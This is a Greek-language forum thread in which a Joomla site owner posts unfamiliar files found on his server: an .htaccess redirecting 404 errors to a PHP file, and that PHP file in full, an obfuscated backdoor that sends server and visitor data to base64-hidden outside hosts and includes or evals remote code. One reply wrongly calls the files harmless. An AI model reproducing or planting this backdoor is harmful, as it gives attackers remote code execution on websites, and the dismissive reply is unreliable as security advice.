Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked

[nikolas]

Τρέχω 30 Joomla sites και στα περισσότερα βρήκα μερικά αρχεία τα οποία δεν ανέβασα εγώ σε αρκετούς φακέλους

Το ένα είναι ενα .htaccess file

Code: Select all

Options -MultiViews
ErrorDocument 404 //administrator/components/com_joomlaxplorer/ftp_tmp/107004.php

Options -MultiViews
ErrorDocument 404 /administrator/components/com_joomlaxplorer/ftp_tmp/107004.php

Και το άλλος αριθμός.php π.χ. 107004.php

Code: Select all

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

Υπάρχει και ένα error_log file στον ίδιο φάκελο

Code: Select all

[06-Feb-2008 16:12:46] PHP Warning:  Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
[06-Feb-2008 16:12:46] PHP Warning:  Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
[07-Feb-2008 06:07:49] PHP Warning:  Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0

Πως ανέβασαν αυτά τα αρχεία; Πως μπορώ να διασφαλίσω την ασφάλεια των ιστοσελίδων μου; αν απλά διαγράψω αυτά τα αρχεία θα είναι εντάξη η ασφάλεια της ιστοσελίδας;

[geof]

Το .htaccess είναι κενό και προφανώς το ανέβασε κάποια εφαρμογή φιλικών URLs
Τα υπόλοιπα είναι δημιουργίες του server σου.

[nikolas]

To .httaccess file δεν ήταν κενό... απλά παραξενο μου φαίνετε και μόνο στις ιστοσελίδες που τρέχουν joomla ... στα άλλα websites στον ίδιο σέρβερ δεν έγινε το ίδιο

[geof]

Κάνε μια σύγκριση με το htaccess.txt και δημοσίευσε ή εξέτασε τις διαφορές που έχει για το τι ακριβώς κάνουν.